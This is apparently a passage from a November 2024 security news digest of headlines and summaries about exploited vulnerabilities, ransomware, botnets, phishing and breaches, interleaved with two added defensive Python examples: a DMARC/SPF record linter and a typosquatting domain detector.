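    The checks a product like this automates across many domains can be written down in a few lines for one domain. The linter below is an added example, not Hornetsecurity's code: it parses a DMARC record and an SPF record and reports the settings that let spoofed mail through, with a constructed weak pair beside a constructed hardened pair. Domain names and records are made up; in practice fetch them with `dig +short TXT _dmarc.example.com` and `dig +short TXT example.com`. Function names are this example's own.

```python
import re

# Added example, not Hornetsecurity's code. Records are constructed samples; obtain real ones
# with:  dig +short TXT _dmarc.example.com   and   dig +short TXT example.com
WEAK_DMARC = "v=DMARC1; p=none"
HARD_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; adkim=s; aspf=s"
WEAK_SPF = "v=spf1 a mx ptr include:_spf.example.net +all"
HARD_SPF = "v=spf1 include:_spf.example.net ip4:203.0.113.0/24 -all"

# SPF mechanisms and modifiers that each cost one of the 10 DNS lookups RFC 7208 allows.
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def parse_dmarc(record: str) -> dict:
    """'v=DMARC1; p=none; rua=mailto:x' -> {'v': 'DMARC1', 'p': 'none', 'rua': 'mailto:x'}"""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def lint_dmarc(record: str) -> list:
    tags = parse_dmarc(record)
    if tags.get("v") != "DMARC1":
        return ["no valid DMARC record: receivers apply no policy at all"]
    findings = []
    policy = tags.get("p", "").lower()
    if policy not in ("none", "quarantine", "reject"):
        findings.append(f"p={policy!r} is not a valid policy; the record is ignored")
    elif policy == "none":
        findings.append("p=none only monitors; mail failing SPF and DKIM alignment is still delivered")
    if "rua" not in tags:
        findings.append("no rua= address: no aggregate reports on who is sending as this domain")
    pct = tags.get("pct", "100")
    if pct != "100":
        findings.append(f"pct={pct}: the policy is applied to only {pct}% of failing mail")
    if tags.get("sp", "").lower() == "none" and policy != "none":
        findings.append("sp=none leaves every subdomain unprotected")
    return findings


def _term_name(term: str) -> str:
    """'+include:foo' -> 'include', 'ip4:1.2.3.4' -> 'ip4', 'redirect=x' -> 'redirect'."""
    return re.split(r"[:/=]", term.lstrip("+-~?").lower(), maxsplit=1)[0]


def lint_spf(record: str) -> list:
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["no valid SPF record"]
    findings = []
    names = [_term_name(t) for t in terms[1:]]
    lookups = sum(1 for n in names if n in LOOKUP_TERMS)
    if lookups > 10:
        findings.append(f"{lookups} lookup terms exceed the limit of 10: receivers return permerror")
    if "ptr" in names:
        findings.append("ptr is deprecated (RFC 7208) and slow; replace it with ip4/ip6 ranges")
    last = terms[-1].lower()
    if last in ("+all", "all"):
        findings.append("'+all' authorises every host on the internet to send as this domain")
    elif last == "?all":
        findings.append("'?all' is neutral: unlisted senders are neither passed nor failed")
    elif last not in ("-all", "~all") and _term_name(last) != "redirect":
        findings.append("no terminating 'all': unlisted senders get a neutral result")
    return findings


def lint_domain(dmarc: str, spf: str) -> dict:
    """Combined report; empty 'dmarc' and 'spf' lists mean the hardened shape."""
    return {"dmarc": lint_dmarc(dmarc), "spf": lint_spf(spf)}


if __name__ == "__main__":
    print("weak:", lint_domain(WEAK_DMARC, WEAK_SPF))
    print("hardened:", lint_domain(HARD_DMARC, HARD_SPF))
```

    The two findings that matter most in practice are `p=none` (DMARC deployed but enforcing nothing) and a permissive `+all`/missing `all` in SPF; the lookup count catches the record that silently turns into `permerror` after one too many `include:` lines.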


    Ngioweb Botnet Fuels NSOCKS Residential Proxy Network Exploiting IoT Devices

    exploits industry
    2024-11-19 https://thehackernews.com/2024/11/ngioweb-botnet-fuels-nsocks-residential.html
    The malware known as Ngioweb has been used to fuel a notorious residential proxy service called NSOCKS, as well as by other services such as VN5Socks and Shopsocks5, new findings from Lumen Technologies reveal. "At least 80% of NSOCKS bots in our telemetry originate from the Ngioweb botnet, mainly utilizing small office/home office (SOHO) routers and IoT devices," the Black Lotus Labs team at

    Autosummary: A breakdown of the residential proxy provider's proxies by device type shows that the botnet operators have targeted a broad spectrum of vendors, including NETGEAR, Uniview, Reolink, Zyxel, Comtrend, SmartRG, Linear Emerge, Hikvision, and NUUO.


    China-linked actor’s malware DeepData exploits FortiClient VPN zero-day

    exploits
    2024-11-19 https://securityaffairs.com/171173/security/china-linked-actors-malware-deepdata-exploits-forticlient-vpn-zero-day.html
    Chinese threat actors use the custom post-exploitation toolkit ‘DeepData’ to exploit a FortiClient VPN zero-day and steal credentials. Volexity researchers discovered a vulnerability in Fortinet’s Windows VPN client that the China-linked threat actor BrazenBamboo abused in their DEEPDATA malware. BrazenBamboo is known to be the author of other malware families, including LIGHTSPY, DEEPDATA, and DEEPPOST. DEEPDATA is a […]

    Autosummary: Among its capabilities, DEEPDATA can steal data from the WeChat, Line, QQ, DingDing, Skype, Telegram, and Feishu applications.


    U.S. CISA adds Progress Kemp LoadMaster, Palo Alto Networks PAN-OS and Expedition bugs to its Known Exploited Vulnerabilities catalog

    exploits
    2024-11-19 https://securityaffairs.com/171168/security/u-s-cisa-progress-kemp-loadmaster-palo-alto-networks-pan-os-and-expedition-bugs-known-exploited-vulnerabilities-catalog.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Progress Kemp LoadMaster, Palo Alto Networks PAN-OS and Expedition bugs to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions of the added vulnerabilities: CVE-2024-1212 is a Progress Kemp LoadMaster […]



    Great Plains Regional Medical Center ransomware attack impacted 133,000 individuals

    exploits ransomware
    2024-11-19 https://securityaffairs.com/171156/data-breach/great-plains-regional-medical-center-data-breach.html
    A ransomware attack on Great Plains Regional Medical Center compromised personal data of 133,000 individuals, exposing sensitive information. On September 8, 2024, Great Plains Regional Medical Center (Oklahoma) suffered a ransomware attack. The organization launched an investigation into the incident with the help of a cybersecurity firm. The healthcare center discovered that a threat actor […]

    Autosummary: The exposed patient info varied by individual and may include name, demographic information, health insurance information, clinical treatment information, such as diagnosis and medication information, driver’s license number, and/or in some instances, Social Security number.


    Brazil arrests soldiers over "plot to kill" President Lula in 2022

    latam
    2024-11-19 https://www.bbc.com/news/articles/c79zj9279nlo
    The suspects allegedly planned to poison the then-president elect before he could take office.

    Autosummary: Lula was elected in October 2022, narrowly defeating incumbent Jair Bolsonaro, who never publicly accepted defeat, and was sworn in on 1 January 2023.


    Oracle warns of Agile PLM file disclosure flaw exploited in attacks

    exploits
    2024-11-19 https://www.bleepingcomputer.com/news/security/oracle-warns-of-agile-plm-file-disclosure-flaw-exploited-in-attacks/
    Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was actively exploited as a zero-day to download files. [...]



    Helldown ransomware exploits Zyxel VPN flaw to breach networks

    exploits ransomware
    2024-11-19 https://www.bleepingcomputer.com/news/security/helldown-ransomware-exploits-zyxel-vpn-flaw-to-breach-networks/
    The new "Helldown" ransomware operation is believed to target vulnerabilities in Zyxel firewalls to breach corporate networks, allowing the attackers to steal data and encrypt devices. [...]

    Autosummary: Figure (source: Sekoia): configuration file similarities. As of November 7, 2024, the threat group listed 31 victims on its recently-renewed extortion portal, primarily small and medium-sized firms based in the United States and Europe.


    Microsoft announces Zero Day Quest hacking event with big rewards

    exploits
    2024-11-19 https://www.helpnetsecurity.com/2024/11/19/microsoft-zero-day-quest-hacking-event/

    Microsoft is enhancing its bug bounty initiatives with the launch of the Zero Day Quest hacking event. With $4 million in potential rewards, it focuses on driving research in critical areas such as cloud computing and AI. Event focus The event invites security researchers to discover and report high-impact vulnerabilities in Microsoft AI and Cloud Bounty Programs: AI, Microsoft Azure, Microsoft Identity, M365, Microsoft Dynamics 365, and Power Platform. “To advance AI security, we will … More



    Microsoft plans to boot security vendors out of the Windows kernel

    Linux
    2024-11-19 https://www.helpnetsecurity.com/2024/11/19/windows-kernel-security-vendors/

    Microsoft has announced the Windows Resiliency Initiative, aimed at avoiding a repeat of the prolonged worldwide IT outage caused by a buggy CrowdStrike update that took down millions of Windows machines and rendered them remotely unfixable. As part of that initiative, the company has announced that it's working on Quick Machine Recovery, a feature that “will enable IT administrators to execute targeted fixes from Windows Update on PCs, even when machines are unable to boot, … More



    Apple fixes two zero-days used in attacks on Intel-based Macs

    exploits
    2024-11-19 https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-used-in-attacks-on-intel-based-macs/
    Apple released emergency security updates to fix two zero-day vulnerabilities that were exploited in attacks on Intel-based Mac systems. [...]



    CISA tags Progress Kemp LoadMaster flaw as exploited in attacks

    exploits
    2024-11-19 https://www.bleepingcomputer.com/news/security/cisa-tags-progress-kemp-loadmaster-flaw-as-exploited-in-attacks/
    The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added three new flaws to its Known Exploited Vulnerabilities (KEV) catalog, including a critical OS command injection flaw impacting Progress Kemp LoadMaster. [...]



    Russian Phobos ransomware operator faces cybercrime charges

    exploits ransomware rusia-ucrania
    2024-11-19 https://securityaffairs.com/171184/cyber-crime/phobos-ransomware-operator-faces-cybercrime-charges.html
    Russian Phobos ransomware operator Evgenii Ptitsyn, suspected of playing a key role in the ransomware operation, was extradited from South Korea to the US to face cybercrime charges. According to the DoJ, the […]

    Autosummary: According to the DoJ, the Phobos ransomware operation targeted over 1,000 public and private entities in the United States and worldwide, extorting more than $16 million in ransom payments. “The Justice Department unsealed criminal charges today against Evgenii Ptitsyn, 42, a Russian national, for allegedly administering the sale, distribution, and operation of Phobos ransomware.”


    NSO Group Exploited WhatsApp to Install Pegasus Spyware Even After Meta's Lawsuit

    exploits
    2024-11-18 https://thehackernews.com/2024/11/nso-group-exploited-whatsapp-to-install.html
    Legal documents released as part of an ongoing legal tussle between Meta's WhatsApp and NSO Group have revealed that the Israeli spyware vendor used multiple exploits targeting the messaging app to deliver Pegasus, including one even after it was sued by Meta for doing so. They also show that NSO Group repeatedly found ways to install the invasive surveillance tool on the target's devices as

    Autosummary: Magnet Forensics, which offers a data extraction tool called GrayKey, confirmed the "inactivity reboot" feature, stating the trigger is "tied to the lock state of the device" and that "once a device has entered a locked state and has not been unlocked within 72 hours, it will reboot."


    Urgent: Critical WordPress Plugin Vulnerability Exposes Over 4 Million Sites

    exploits
    2024-11-18 https://thehackernews.com/2024/11/urgent-critical-wordpress-plugin.html
    A critical authentication bypass vulnerability has been disclosed in the Really Simple Security (formerly Really Simple SSL) plugin for WordPress that, if successfully exploited, could allow an attacker to remotely gain full administrative access to a susceptible site. The vulnerability, tracked as CVE-2024-10924 (CVSS score: 9.8), impacts both free and premium versions of the plugin. The



    THN Recap: Top Cybersecurity Threats, Tools, and Practices (Nov 11 - Nov 17)

    ciber
    2024-11-18 https://thehackernews.com/2024/11/thn-recap-top-cybersecurity-threats_18.html
    What do hijacked websites, fake job offers, and sneaky ransomware have in common? They’re proof that cybercriminals are finding smarter, sneakier ways to exploit both systems and people. This week makes one thing clear: no system, no person, no organization is truly off-limits. Attackers are getting smarter, faster, and more creative—using everything from human trust to hidden flaws in

    Autosummary: Trending CVEs: recent cybersecurity developments have highlighted several critical vulnerabilities, including CVE-2024-10924, CVE-2024-10470, CVE-2024-10979, CVE-2024-9463, CVE-2024-9465, CVE-2024-43451, CVE-2024-49039, CVE-2024-8068, CVE-2024-8069, CVE-2023-28649, CVE-2023-31241, CVE-2023-28386, CVE-2024-50381, CVE-2024-7340, and CVE-2024-47574. WIRTE Targets Israel With SameCoin Wiper: WIRTE, a Middle Eastern threat actor affiliated with Hamas, has orchestrated cyber espionage operations against the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt, and has also carried out disruptive attacks that exclusively target Israeli entities using the SameCoin wiper. Honeytokens are fake files, links, or credentials, like "Confidential_Report_2024.xlsx" or a fake AWS key, placed in spots attackers love to snoop: shared drives, admin folders, or cloud storage. URLCrazy is an OSINT tool designed for cybersecurity professionals to generate and test domain typos or variations, effectively detecting and preventing typosquatting, URL hijacking, phishing, and corporate espionage.


    Fake Discount Sites Exploit Black Friday to Hijack Shopper Information

    exploits
    2024-11-18 https://thehackernews.com/2024/11/fake-discount-sites-exploit-black.html
    A new phishing campaign is targeting e-commerce shoppers in Europe and the United States with bogus pages that mimic legitimate brands with the goal of stealing their personal information ahead of the Black Friday shopping season. "The campaign leveraged the heightened online shopping activity in November, the peak season for Black Friday discounts. The threat actor used fake discounted products

    Autosummary: The phishing domains have been found to use top-level domains (TLDs) such as .top, .shop, .store, and .vip, often typosquatting legitimate e-commerce organizations' domain names as a way to lure victims (e.g., northfaceblackfriday[.]shop).
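    Both the Black Friday lures here and the URLCrazy entry in the THN recap above come down to lookalike domain names. The detector below is an added example, not code from either article or from URLCrazy: given a constructed brand watch list and a batch of observed domains (as you would pull from a new-registration feed or proxy logs), it refangs `[.]` notation, flags labels that embed a brand or sit one keystroke away from it (optimal-string-alignment edit distance rather than URLCrazy's generated typo list), and notes the TLDs and seasonal keywords the campaign favoured. The registrable label is taken naively as the second-last DNS label; a real deployment would consult the Public Suffix List. Names and sample domains are this example's own.

```python
# Added example, not from the articles. Watch list and observed domains are constructed.
BRANDS = {"northface", "amazon", "hsbc"}
CAMPAIGN_TLDS = {"top", "shop", "store", "vip"}   # TLDs named in the campaign findings
LURE_WORDS = ("blackfriday", "cybermonday", "deal", "discount", "sale")

OBSERVED = [
    "northfaceblackfriday[.]shop",   # brand + seasonal lure on a campaign TLD
    "amazon.com",                    # the real thing: label equals the brand
    "amazom[.]top",                  # one keystroke away from the brand
    "hsbc-rewards.store",
    "example.org",                   # unrelated, should pass
]


def refang(domain: str) -> str:
    """Turn defanged IOC notation such as 'evil[.]shop' back into a hostname."""
    return domain.strip().lower().replace("[.]", ".").replace("(.)", ".")


def osa_distance(a: str, b: str) -> int:
    """Optimal-string-alignment edit distance: insert, delete, substitute, or
    swap two adjacent characters each cost 1, so 'amaozn' -> 'amazon' is 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def split_domain(domain: str):
    """Return (registrable label, TLD). Assumption: the second-last label is the
    registrable one; use the Public Suffix List for co.uk-style suffixes."""
    labels = refang(domain).split(".")
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def assess_domain(domain: str, brands=BRANDS) -> dict:
    label, tld = split_domain(domain)
    reasons = []
    for brand in sorted(brands):
        if label == brand:
            continue                        # exact brand label: nothing to flag here
        if brand in label:
            reasons.append(f"embeds brand '{brand}'")
        elif osa_distance(label, brand) == 1:
            reasons.append(f"one edit away from '{brand}'")
    if reasons:                             # context only matters once a brand is involved
        if tld in CAMPAIGN_TLDS:
            reasons.append(f".{tld} is a TLD favoured by the campaign")
        if any(word in label for word in LURE_WORDS):
            reasons.append("seasonal discount lure in the name")
    return {"domain": refang(domain), "suspicious": bool(reasons), "reasons": reasons}


def triage(domains) -> list:
    """Return only the domains worth an analyst's time, most reasons first."""
    hits = [r for r in map(assess_domain, domains) if r["suspicious"]]
    return sorted(hits, key=lambda r: -len(r["reasons"]))


if __name__ == "__main__":
    for hit in triage(OBSERVED):
        print(hit["domain"], "->", "; ".join(hit["reasons"]))
```

    Edit distance one covers the omission, transposition and substitution typos URLCrazy enumerates; the brand-substring rule is what catches the campaign's `brand + blackfriday` pattern, which no typo generator produces.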


    T-Mobile is one of the victims of the massive Chinese breach of telecom firms

    Telcos
    2024-11-18 https://securityaffairs.com/171127/apt/t-mobile-victim-chinese-breach-of-telco-firms.html
    T-Mobile confirmed that it was hacked as part of a long-running cyber espionage campaign, linked to China-based threat actors, targeting telecom companies. Recently, the FBI and CISA announced they are continuing to investigate a large-scale cyber-espionage campaign by China-linked threat actors targeting U.S. telecoms, […]

    Autosummary: “T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information,” a company spokeswoman told WSJ. In September, the Wall Street Journal reported that China-linked APT group Salt Typhoon (also known as FamousSparrow and GhostEmperor) breached U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies, potentially accessing systems for lawful wiretapping and other data.


    Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474)

    exploits
    2024-11-18 https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/

    Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days. About the vulnerabilities (CVE-2024-0012, CVE-2024-9474) CVE-2024-0012 stems from missing authentication for a critical function and allows unauthenticated attackers with network access to the management web interface “to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474,” according to Palo … More


    Autosummary: Both vulnerabilities have been fixed in PAN-OS 10.2.12-h2, PAN-OS 11.0.6-h1, PAN-OS 11.1.5-h1, PAN-OS 11.2.4-h1, and all later PAN-OS versions.


    US charges Phobos ransomware admin after South Korea extradition

    exploits ransomware
    2024-11-18 https://www.bleepingcomputer.com/news/security/us-charges-phobos-ransomware-admin-after-south-korea-extradition/
    Evgenii Ptitsyn, a Russian national and suspected administrator of the Phobos ransomware operation, was extradited from South Korea and is facing cybercrime charges in the United States. [...]

    Autosummary: "Ptitsyn and his co-conspirators hacked not only large corporations but also schools, hospitals, nonprofits, and a federally recognized tribe, and they extorted more than $16 million in ransom payments," said Nicole M. Argentieri, the head of the Justice Department's Criminal Division.


    Critical RCE bug in VMware vCenter Server now exploited in attacks

    exploits
    2024-11-18 https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
    Broadcom warned today that attackers are now exploiting two VMware vCenter Server vulnerabilities, one of which is a critical remote code execution flaw. [...]



    QuickBooks popup scam still being delivered via Google ads

    financial
    2024-11-18 https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads
    When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.

    Autosummary: The application that creates it is a program written in Microsoft .NET, which contains two important methods that control when and how the popup appears: MonitorAndShowForm(), which calls CalculateNextDisplayDate and is incremented on weekdays, and CheckTimeWindow(), which makes sure it is a weekday and within a certain time window. The text content (fake instructions) is encoded in Base64, presumably to avoid detection by antivirus software. This clever scheme has been going on for some time now, and every now and again we see people reporting it online, seemingly always via Google ads.


    New Stealthy BabbleLoader Malware Spotted Delivering WhiteSnake and Meduza Stealers

    exploits
    2024-11-18 https://thehackernews.com/2024/11/new-stealthy-babbleloader-malware.html
    Cybersecurity researchers have shed light on a new stealthy malware loader called BabbleLoader that has been observed in the wild delivering information stealer families such as WhiteSnake and Meduza. BabbleLoader is an "extremely evasive loader, packed with defensive mechanisms, that is designed to bypass antivirus and sandbox environments to deliver stealers into memory," Intezer security

    Autosummary: This includes but is not limited to Dolphin Loader, Emmenhtal, FakeBat, and Hijack Loader, among others, which have been used to propagate various payloads like CryptBot, Lumma Stealer, SectopRAT, SmokeLoader, and Ursnif.


    Chinese hackers exploit Fortinet VPN zero-day to steal credentials

    exploits
    2024-11-18 https://www.bleepingcomputer.com/news/security/chinese-hackers-exploit-fortinet-vpn-zero-day-to-steal-credentials/
    Chinese threat actors use a custom post-exploitation toolkit named "DeepData" to exploit a zero-day vulnerability in Fortinet's FortiClient Windows VPN client to steal credentials. [...]

    Autosummary: Figure (source: Volexity): information in memory targeted by DeepData. By compromising VPN accounts, BrazenBamboo can gain initial access to corporate networks, where they can then spread laterally, gain access to sensitive systems, and generally expand espionage campaigns.


    US space tech giant Maxar discloses employee data breach

    financial
    2024-11-18 https://www.bleepingcomputer.com/news/security/us-space-tech-giant-maxar-discloses-employee-data-breach/
    Hackers breached U.S. satellite maker Maxar Space Systems and accessed personal data belonging to its employees, the company informs in a notification to impacted individuals. [...]



    Palo Alto Networks patches two firewall zero-days used in attacks

    exploits
    2024-11-18 https://www.bleepingcomputer.com/news/security/palo-alto-networks-patches-two-firewall-zero-days-used-in-attacks/
    Palo Alto Networks has finally released security updates for two actively exploited zero-day vulnerabilities in its Next-Generation Firewalls (NGFW). [...]



    Recently disclosed VMware vCenter Server bugs are actively exploited in attacks

    exploits
    2024-11-18 https://securityaffairs.com/171147/security/vmware-vcenter-server-bugs-actively-exploited.html
    Broadcom warns that threat actors are actively exploiting two VMware vCenter Server vulnerabilities, tracked as CVE-2024-38812 and CVE-2024-38813. “Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.” […]



    Seven-year-old gets job offer from Russian IT firm

    rusia-ucrania
    2024-11-18 https://www.bbc.com/news/articles/crr91exlwd8o
    The software company's boss said Sergey, who teaches coding in online videos, was "a kind of Mozart"



    A botnet exploits a GeoVision zero-day to compromise EoL devices

    exploits
    2024-11-17 https://securityaffairs.com/171067/malware/ddos-botnet-exploits-geovision-zero-day.html
    A botnet used for DDoS or cryptomining attacks is exploiting a zero-day in end-of-life GeoVision devices to grow. Researchers at the Shadowserver Foundation observed the botnet exploiting the flaw to compromise devices in the wild. The GeoVision zero-day, tracked as CVE-2024-11120 (CVSS 9.8), is a pre-auth command injection vulnerability […]



    Week in review: Microsoft patches actively exploited 0-days, Amazon and HSBC employee data leaked

    exploits
    2024-11-17 https://www.helpnetsecurity.com/2024/11/17/week-in-review-microsoft-patches-actively-exploited-0-days-amazon-and-hsbc-employee-data-leaked/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) November 2024 Patch Tuesday is here, and Microsoft has dropped fixes for 89 new security issues in its various products, two of which – CVE-2024-43451 and CVE-2024-49039 – are actively exploited by attackers. Massive troves of Amazon, HSBC employee data leaked A threat actor who goes by the online moniker “Nam3L3ss” has leaked … More

    The post Week in review: Microsoft patches actively exploited 0-days, Amazon and HSBC employee data leaked appeared first on Help Net Security.

    Autosummary: New infosec products of the week: November 15, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Absolute Security, BlackFog, Eurotech, Nirmata, Rakuten Viber, Syteca, and Vectra. Massive troves of Amazon, HSBC employee data leaked A threat actor who goes by the online moniker “Nam3L3ss” has leaked employee data belonging to a number of corporations – including Amazon, 3M, HSBC and HP – ostensibly compromised during the May 2023 MOVEit hack by the Cl0p ransomware gang, which affected British Airways, the BBC, Aer Lingus, Boots.


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 20

    exploits
    2024-11-17 https://securityaffairs.com/171089/malware/security-affairs-malware-newsletter-round-20.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. New Campaign Uses Remcos RAT to Exploit Victims Bengal cat lovers in Australia get psspsspss’d in Google-driven […]


    Phishing emails increasingly use SVG attachments to evade detection

    financial
    2024-11-17 https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/
    Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. [...]

    Autosummary: For example, the following text will create a rectangle, a circle, a link, and some text: <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg"> <!--


    Brazil first lady uses expletive against Elon Musk at G20 event

    latam
    2024-11-17 https://www.bbc.com/news/articles/cwy1693xwlzo
    Janja Lula da Silva joked that she was not afraid of the owner of social media platform X.


    Mexico's Ramirez outclasses Billam-Smith to unify boxing titles

    latam
    2024-11-17 https://www.bbc.com/sport/boxing/articles/cy8nlpeww9go
    Mexican Gilberto Ramirez defeats Briton Chris Billam-Smith in Saudi Arabia to become the unified WBA and WBO cruiserweight champion.

    Autosummary: The victory was a comfortable one for "Zurdo" on the cards, the judges at ringside scoring it 116-112, 116-112 and 116-113.


    PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released

    exploits
    2024-11-16 https://thehackernews.com/2024/11/pan-os-firewall-vulnerability-under.html
    Palo Alto Networks has released new indicators of compromise (IoCs) a day after the network security vendor confirmed that a new zero-day vulnerability impacting its PAN-OS firewall management interface has been actively exploited in the wild. To that end, the company said it observed malicious activity originating from the IP addresses below and targeting PAN-OS management web interface IP

    Autosummary: The advisory comes as three different critical flaws in the Palo Alto Networks Expedition (CVE-2024-5910, CVE-2024-9463, and CVE-2024-9465) have come under active exploitation, per the U.S. Cybersecurity and Infrastructure Security Agency (CISA).


    Warning: DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials

    exploits
    2024-11-16 https://thehackernews.com/2024/11/warning-deepdata-malware-exploiting.html
    A threat actor known as BrazenBamboo has exploited an unresolved security flaw in Fortinet's FortiClient for Windows to extract VPN credentials as part of a modular framework called DEEPDATA. Volexity, which disclosed the findings Friday, said it identified the zero-day exploitation of the credential disclosure vulnerability in July 2024, describing BrazenBamboo as the developer behind DEEPDATA,

    Autosummary: The malware first came to light earlier this week, when BlackBerry detailed the Windows-based surveillance framework as used by the China-linked APT41 threat actor to harvest data from WhatsApp, Telegram, Signal, WeChat, LINE, QQ, Skype, Microsoft Outlook, DingDing, Feishu, KeePass, as well as application passwords, web browser information, Wi-Fi hotspots, and installed software.


    T-Mobile confirms it was hacked in recent wave of telecom breaches

    Telcos
    2024-11-16 https://www.bleepingcomputer.com/news/security/t-mobile-confirms-it-was-hacked-in-recent-wave-of-telecom-breaches/
    T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. [...]


    Palo Alto Networks confirmed active exploitation of recently disclosed zero-day

    exploits
    2024-11-16 https://securityaffairs.com/171057/hacking/palo-alto-networks-zero-day-exploitation.html
    Palo Alto Networks confirmed active exploitation of a zero-day in its PAN-OS firewall and released new indicators of compromise (IoCs). Last week, Palo Alto Networks warned customers to limit access to their next-gen firewall management interface due to a potential remote code execution vulnerability (CVSSv4.0 Base Score: 9.3) in PAN-OS. The cybersecurity company had no […]

    Autosummary: This week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following Palo Alto Networks Expedition vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-9463 (Palo Alto Networks Expedition OS Command Injection Vulnerability) and CVE-2024-9465 (Palo Alto Networks Expedition SQL Injection Vulnerability). Pierluigi Paganini (SecurityAffairs)


    NSO Group used WhatsApp exploits even after Meta-owned company sued it

    exploits
    2024-11-16 https://securityaffairs.com/171047/security/nso-group-used-whatsapp-exploits-even-after-meta-owned-company-sued-it.html
    Court filing revealed that NSO Group used WhatsApp exploits after the instant messaging firm sued the surveillance company. NSO Group developed malware that relied on WhatsApp exploits to infect target individuals even after the Meta-owned instant messaging company sued the surveillance firm. “As a threshold matter, NSO admits that it developed and sold the spyware […]

    Autosummary: “As a threshold matter, NSO admits that it developed and sold the spyware described in the Complaint, and that NSO’s spyware—specifically its zero-click installation vector called “Eden,” which was part of a family of WhatsApp-based vectors known collectively as “Hummingbird” (collectively, the “Malware Vectors”)—was responsible for the attacks described in the Complaint.


    Argentina orders arrests of pro-Bolsonaro rioters

    latam industry
    2024-11-16 https://www.bbc.com/news/articles/c3demgg542do
    Many Bolsonaro supporters are believed to have fled to Argentina following prosecutions for the Brasilia riots.

    Autosummary: Scores of Bolsonaro supporters are believed to have fled to Argentina following prosecutions for the January 2023 riots. Others fled to Argentina to escape their sentences, particularly after far-right politician Javier Milei was elected president in December 2023.


    Using AI to drive cybersecurity risk scoring systems

    ciber
    2024-11-15 https://www.helpnetsecurity.com/2024/11/15/ai-driven-risk-scoring-systems-cybersecurity-video/

    In this Help Net Security video, Venkat Gopalakrishnan, Principal Data Science Manager at Microsoft, discusses the development of AI-driven risk scoring models tailored for cybersecurity threats, and how AI is revolutionizing risk assessment and management in cybersecurity.

    The post Using AI to drive cybersecurity risk scoring systems appeared first on Help Net Security.



    CISA Flags Critical Palo Alto Network Flaws Actively Exploited in the Wild

    exploits
    2024-11-15 https://thehackernews.com/2024/11/cisa-flags-critical-palo-alto-network.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that two more flaws impacting the Palo Alto Networks Expedition have come under active exploitation in the wild. To that end, it has added the vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the necessary updates by December 5,


    USX Cyber strengthens phishing defense in GUARDIENT XDR

    financial
    2024-11-15 https://www.helpnetsecurity.com/2024/11/15/usx-cyber-phishing-protection-tools/

    USX Cyber released advanced phishing protection tools within its GUARDIENT XDR platform. This latest enhancement enables organizations to strengthen defenses against sophisticated phishing attacks by providing employees with realistic training and heightened awareness of phishing threats. Phishing attacks are growing increasingly sophisticated and dangerous as threat actors exploit social engineering techniques and AI to enhance their tactics. The new suite includes a phishing simulation tool that mimics real-world phishing techniques, equipping employees to identify and respond … More

    The post USX Cyber strengthens phishing defense in GUARDIENT XDR appeared first on Help Net Security.



    High-Severity Flaw in PostgreSQL Allows Hackers to Exploit Environment Variables

    exploits
    2024-11-15 https://thehackernews.com/2024/11/high-severity-flaw-in-postgresql-allows.html
    Cybersecurity researchers have disclosed a high-severity security flaw in the PostgreSQL open-source database system that could allow unprivileged users to alter environment variables, and potentially lead to code execution or information disclosure. The vulnerability, tracked as CVE-2024-10979, carries a CVSS score of 8.8. Environment variables are user-defined values that can allow a program


    Cybercriminals hijack DNS to build stealth attack networks

    ciber
